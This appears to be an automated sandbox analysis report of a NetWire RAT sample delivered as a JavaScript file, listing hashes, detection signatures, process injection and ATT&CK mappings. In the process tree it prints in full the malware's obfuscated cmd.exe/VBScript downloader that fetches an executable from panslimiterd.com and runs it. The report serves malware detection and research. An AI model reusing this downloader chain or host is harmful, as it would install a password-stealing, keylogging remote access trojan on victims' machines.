netwire | 4bb4b8edf4873f8c3416d4a7c76fc38f45eb3aae31b4fd1569cb3cff081796f9

General

Target

IMAGE2102100021110001.js
Size

7KB
MD5

8a3dfd884399d98c9e5b25fc5cc14628
SHA1

376db27f44dcb2e76d70407f9bb1bb0c3a9d8185
SHA256

717c8e21ae8aac9685a43722d18bcb6746875654fdefba88250c5c2fe6ce4ace
SHA512

07633ce6257057461b47e962fba7dbffc6e96cf1f74354567baabe1fb6ef744d8b7f49c7e083dd0a291666ffbf8d7aa29d6676c14522ef110c82e3248f11fa57

Score

10^/10

netwire botnet rat stealer

Malware Config

Signatures

NetWire RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1436-19-0x0000000000400000-0x0000000000433000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

5 1996 WScript.exe
Executes dropped EXE 2 IoCs

Processes:

IZU.EXEIZU.EXE

pid process

544 IZU.EXE
1436 IZU.EXE
Loads dropped DLL 2 IoCs

Processes:

IZU.EXE

pid process

544 IZU.EXE
544 IZU.EXE
Suspicious use of SetThreadContext 1 IoCs

Processes:

IZU.EXE

description pid process target process

PID 544 set thread context of 1436 544 IZU.EXE IZU.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
5	1996	WScript.exe

pid	process
544	IZU.EXE
1436	IZU.EXE

pid	process
544	IZU.EXE
544	IZU.EXE

description	pid	process	target process
PID 544 set thread context of 1436	544	IZU.EXE	IZU.EXE

NSIS installer 8 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_2
\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_1
\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\IZU.EXE	nsis_installer_2

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1076 timeout.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

IZU.EXE

pid process

544 IZU.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

IZU.EXE

pid process

544 IZU.EXE
544 IZU.EXE
544 IZU.EXE
544 IZU.EXE
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

IZU.EXE

pid process

544 IZU.EXE

pid	process
1076	timeout.exe

pid	process
544	IZU.EXE

pid	process
544	IZU.EXE
544	IZU.EXE
544	IZU.EXE
544	IZU.EXE

pid	process
544	IZU.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

wscript.execmd.exeIZU.EXE

description	pid	process	target process
PID 328 wrote to memory of 1912	328	wscript.exe	cmd.exe
PID 328 wrote to memory of 1912	328	wscript.exe	cmd.exe
PID 328 wrote to memory of 1912	328	wscript.exe	cmd.exe
PID 1912 wrote to memory of 1996	1912	cmd.exe	WScript.exe
PID 1912 wrote to memory of 1996	1912	cmd.exe	WScript.exe
PID 1912 wrote to memory of 1996	1912	cmd.exe	WScript.exe
PID 1912 wrote to memory of 1076	1912	cmd.exe	timeout.exe
PID 1912 wrote to memory of 1076	1912	cmd.exe	timeout.exe
PID 1912 wrote to memory of 1076	1912	cmd.exe	timeout.exe
PID 1912 wrote to memory of 544	1912	cmd.exe	IZU.EXE
PID 1912 wrote to memory of 544	1912	cmd.exe	IZU.EXE
PID 1912 wrote to memory of 544	1912	cmd.exe	IZU.EXE
PID 1912 wrote to memory of 544	1912	cmd.exe	IZU.EXE
PID 544 wrote to memory of 1436	544	IZU.EXE	IZU.EXE
PID 544 wrote to memory of 1436	544	IZU.EXE	IZU.EXE
PID 544 wrote to memory of 1436	544	IZU.EXE	IZU.EXE
PID 544 wrote to memory of 1436	544	IZU.EXE	IZU.EXE
PID 544 wrote to memory of 1436	544	IZU.EXE	IZU.EXE

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\IMAGE2102100021110001.js
1⤵
- Suspicious use of WriteProcessMemory
PID:328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO Q1o = "http://panslimiterd.com/image.exe">>A9i.vBe &@EChO T6x = E0r("hytMdwd")>>A9i.vBe &@EChO Set L5y = CreateObject(E0r("lrwlkQMwlkgsso"))>>A9i.vBe &@EChO L5y.Open E0r("fds"), Q1o, False>>A9i.vBe &@EChO L5y.send ("")>>A9i.vBe &@EChO Set G1l = CreateObject(E0r("`cncaMrsqd`l"))>>A9i.vBe &@EChO G1l.Open>>A9i.vBe &@EChO G1l.Type = 1 >>A9i.vBe &@EChO G1l.Write L5y.ResponseBody>>A9i.vBe & @EChO G1l.Position = 0 >>A9i.vBe &@EChO G1l.SaveToFile T6x, 2 >>A9i.vBe &@EChO G1l.Close>>A9i.vBe &@EChO function E0r(M6e) >> A9i.vBe &@EChO For H5h = 1 To Len(M6e) >>A9i.vBe &@EChO E9c = Mid(M6e, H5h, 1) >>A9i.vBe &@EChO E9c = Chr(Asc(E9c)- 31) >>A9i.vBe &@EChO I3d = I3d + E9c >> A9i.vBe &@EChO Next >>A9i.vBe &@EChO E0r = I3d >>A9i.vBe &@EChO End Function >>A9i.vBe& A9i.vBe &DEL A9i.vBe & timeout 12 & IZU.EXE
2⤵
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A9i.vBe"
3⤵
- Blocklisted process makes network request
PID:1996

C:\Windows\system32\timeout.exe
timeout 12
3⤵
- Delays execution with timeout.exe
PID:1076

C:\Users\Admin\AppData\Local\Temp\IZU.EXE
IZU.EXE
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:544

C:\Users\Admin\AppData\Local\Temp\IZU.EXE
IZU.EXE
4⤵
- Executes dropped EXE
PID:1436

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A9i.vBe
MD5
d7e4ca7edbd5319f72f69a326582d7ab

SHA1
6f5b22b689ce2cda972a991b1d8dfaf01bb7b1d2

SHA256
951d293be13f6a9a61d31df0adf73af083337b7fb4e11cf19581889d16087850

SHA512
6f6403e436ee4ab29fa4366e284745bb8776ae5e851197ce6f601d19a9c5e77e12fe69522d18bbae4cf8dba2a25e5a3b593ebd8242b3dde1d4c357482da9d8b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\IZU.EXE
MD5
059d96b63981600043166193b25f479e

SHA1
7bc871be5b1905692eb1a6d93158668092cdb51c

SHA256
f77b3b293e8f2218082419742b85c2156fe8c13353cec54ba021e26312d3698f

SHA512
9c10be0296905681b1c52f126ee86a78fe6004f1ffc895e08b403d0726f464546fd308ee57383be23f06fd09e1f099bca3e8b7916715642bdebc2019abb1d2ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\IZU.EXE
MD5
059d96b63981600043166193b25f479e

SHA1
7bc871be5b1905692eb1a6d93158668092cdb51c

SHA256
f77b3b293e8f2218082419742b85c2156fe8c13353cec54ba021e26312d3698f

SHA512
9c10be0296905681b1c52f126ee86a78fe6004f1ffc895e08b403d0726f464546fd308ee57383be23f06fd09e1f099bca3e8b7916715642bdebc2019abb1d2ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\IZU.EXE
MD5
059d96b63981600043166193b25f479e

SHA1
7bc871be5b1905692eb1a6d93158668092cdb51c

SHA256
f77b3b293e8f2218082419742b85c2156fe8c13353cec54ba021e26312d3698f

SHA512
9c10be0296905681b1c52f126ee86a78fe6004f1ffc895e08b403d0726f464546fd308ee57383be23f06fd09e1f099bca3e8b7916715642bdebc2019abb1d2ed

Download Submit
\Users\Admin\AppData\Local\Temp\IZU.EXE
MD5
059d96b63981600043166193b25f479e

SHA1
7bc871be5b1905692eb1a6d93158668092cdb51c

SHA256
f77b3b293e8f2218082419742b85c2156fe8c13353cec54ba021e26312d3698f

SHA512
9c10be0296905681b1c52f126ee86a78fe6004f1ffc895e08b403d0726f464546fd308ee57383be23f06fd09e1f099bca3e8b7916715642bdebc2019abb1d2ed

Download Submit
\Users\Admin\AppData\Local\Temp\nsxC2F2.tmp\wxh1lz88z2hnpbv.dll
MD5
dc75a8b470f13c8ee2509f84e5e05eb9

SHA1
27fe57d610f4c9ff84377911cff2c7db0aa7e0ee

SHA256
e416459e6f3011911ecbb3b3eba891b0f82668bef98ea6cbe05ef56dc645027d

SHA512
22fbfc9614c5bfbc1e6c5370144d26a540f726edb9b7d7c615f91f179f88f8eb1dff72daff51d594274a326f88404e150a91b3c95aa0b192d6d4a4d28bd11629

Download Submit
memory/328-3-0x0000000002760000-0x0000000002764000-memory.dmp

Filesize
16KB

Download
memory/544-13-0x00000000761E1000-0x00000000761E3000-memory.dmp

Filesize
8KB

Download
memory/544-11-0x0000000000000000-mapping.dmp

Download
memory/676-7-0x000007FEF6310000-0x000007FEF658A000-memory.dmp

Filesize
2.5MB

Download
memory/1076-9-0x0000000000000000-mapping.dmp

Download
memory/1436-16-0x000000000040242D-mapping.dmp

Download
memory/1436-19-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1912-4-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp

Filesize
8KB

Download
memory/1912-2-0x0000000000000000-mapping.dmp

Download
memory/1996-8-0x00000000026C0000-0x00000000026C4000-memory.dmp

Filesize
16KB

Download
memory/1996-5-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads